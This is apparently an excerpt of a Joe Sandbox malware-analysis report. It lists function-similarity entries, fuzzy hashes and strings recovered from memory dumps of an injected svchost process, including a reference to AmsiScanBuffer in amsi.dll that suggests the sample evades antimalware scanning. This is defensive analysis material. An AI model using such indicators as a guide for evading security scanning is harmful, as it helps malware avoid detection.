                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: $nya-
                                                                      • API String ID: 756756679-1266920357
                                                                      • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction ID: d889df4fe8d1a840769c70fd5203ff54fc7a19c2d2b0e5b470582681e6a1678b
                                                                      • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction Fuzzy Hash: 1E318032702F5997FB52DFAAE5607A967E2FB44B84F0840209F59A7F55EF38C4A18700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$Value$FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 365477584-0
                                                                      • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction ID: e11bbea06196bbc199e581ac06c3e20bbd0685195d77fb4270d9697d9ae5dd5f
                                                                      • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction Fuzzy Hash: 34113D31300F4142FB56E7F168323FE22D3AB897A4F554625A867777D6DE28E80AA301
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$Value$FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 365477584-0
                                                                      • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction ID: 0b9045c82b04addd83dc5d791b3e16171f63e91f116109334304dd3d99634190
                                                                      • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                                      • Instruction Fuzzy Hash: 10114F35302E4882FB5667FA6C313FE53D3AB85790F944625A86BF6FCACE28D4018300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction ID: 7d8eb1017b43f4b5396ad9adda2af2bcc80ac7578dd52b9de159e9a0045465e1
                                                                      • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction Fuzzy Hash: FB015B71704F8082EB51DB92A86839973E3F799FC1F4840349E4D53754DE38D98AC740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction ID: 55bcea4c2c89e35b6463ee642e84fffe58ee4405f8d15e32e42ae75f7b375612
                                                                      • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                                      • Instruction Fuzzy Hash: 8A018031701F4082EB11DB92A86879963E2F789FC1F884034DE9E93B54DE7CC585C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction ID: 632148a9d37a8770e03a773fd2a0afd4088a582302557ae64b0d27b54c13c175
                                                                      • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction Fuzzy Hash: 11015B74B05F4082EB669BE5E86839972F2AB99B42F040024D94D663A4EF3DD05DD700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction ID: a462aad4ab7fa4baf423d458df7630f06fd276381457734578858b334e6ce441
                                                                      • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                                      • Instruction Fuzzy Hash: B0015275312F44C2FB269BA5E86879973E2BB45B46F040025CD4E67B68EF7DC048C750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction ID: 007245ec54d75a794716289a711f6e9c89786dcaf702f45a6b3a02fbf55a59ab
                                                                      • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction Fuzzy Hash: C7F0AF72304A8492EB618BE1F8E43A973B3F795B89FC44021DA4953A64DE7CD68DDB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction ID: d6e9e678f82bab4348688637e1629e2a6a37cdb1a011e7df00299222928d5e71
                                                                      • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                                      • Instruction Fuzzy Hash: 36F0C832304E8592E7218FA5F4E47D963E2F754BC8FC44021CA4952E54DF7CC688CB10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction ID: c2ea74d0e4b43787c242fccb3ca49c895b892b977b25d57424b6dfe402f8caf7
                                                                      • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction Fuzzy Hash: 4EF09071301F4181EB268BE4A8B57A963A2EBDA766F940319DA6A651E4CF3CD44DE300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction ID: a3bbb5c4d7fce30f9518b8c66632d3fb4f5c13679670c1bdd0da67fe5652c17b
                                                                      • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction Fuzzy Hash: 56F08974314F8081EB468BD3B9241A976A3B799FC1F444030ED0667764CE3CD4499700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction ID: 4a029afccfd20abfc000deb6728c4e17700f5b9d3ba93e1edbb5746d1dd9f9cc
                                                                      • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                                                      • Instruction Fuzzy Hash: ADF05E74304F8482EB059F97B92419962E2AB49FC1F448430EE0A67F18CE68C5458750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction ID: ff1f608ab6b6f35458b95ed6a99513a04395d250144898ac4917ce25a483aeec
                                                                      • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                                                      • Instruction Fuzzy Hash: B1F0BB31301F0541FF118B94D8643E923F2EB45761F540319DA7A55AE8CF3CC449C310
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProcSleep
                                                                      • String ID: AmsiScanBuffer$amsi.dll
                                                                      • API String ID: 188063004-3248079830
                                                                      • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction ID: 021e1d068d77b3df3e73d62d2490259398199a639ad21284c0ee90d309d470d8
                                                                      • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                                      • Instruction Fuzzy Hash: 9BD06770B15E00D5EB4BABD1E8B53E832E3ABF5B02FC80815C50A252A0DE2CA55DE340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction ID: 8c5fc4f44a05ee5ee593e4b34b3eab8e4509f5c5cbb5b3cfab8dac729e4b2368
                                                                      • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction Fuzzy Hash: 9402D93621DB8486E761CB95F4A13AAB7E1F3C4794F104015EA8E97BA8DF7CD489DB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction ID: 4f7c97b87c585921e5957ddec0f3c0c97a09a4b464653c87013dffe8e29aad42
                                                                      • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                                                      • Instruction Fuzzy Hash: C402B736219B8486E7A1CB99F4A039AB7E1F3C4794F104115EA8E97FA9DF7CC494CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction ID: c38a1825a7be4ae8512867ee821e683eadb78cd61cf93f1acaa63eb26394960e
                                                                      • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction Fuzzy Hash: CC51B435744F1187E366CBD6E4616A9B3E2F784B44F504119DD4AA3B54DF38E84EE700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction ID: 642933fc255e9386b03da153ad2cad646397c63b6e49b96fafd9578adb96d7a2
                                                                      • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                                      • Instruction Fuzzy Hash: 8551E535616E0587E326DF9AE460E9A73E2F788B80F544029DD5BA3F54DF38C846CB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3553296187.00000195DE1A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DE1A0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3552420389.00000195DE1A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3554354654.00000195DE1B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3555153189.00000195DE1C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556052258.00000195DE1C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3556918393.00000195DE1C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195de1a0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction ID: a10af872b50eb1a9a9280d86d9e28e416f0bd79b10d8077c762e4f2d1207b409
                                                                      • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                                                      • Instruction Fuzzy Hash: DE51B331754F5187E726CFD6A4616AAB3E7F389B80F404119ED4AA3754DF38E80AEB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3522631410.00000195DD5C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.3521736170.00000195DD5C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3523800267.00000195DD5D5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3524710151.00000195DD5E0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3525689535.00000195DD5E2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.3526684099.00000195DD5E9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_195dd5c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
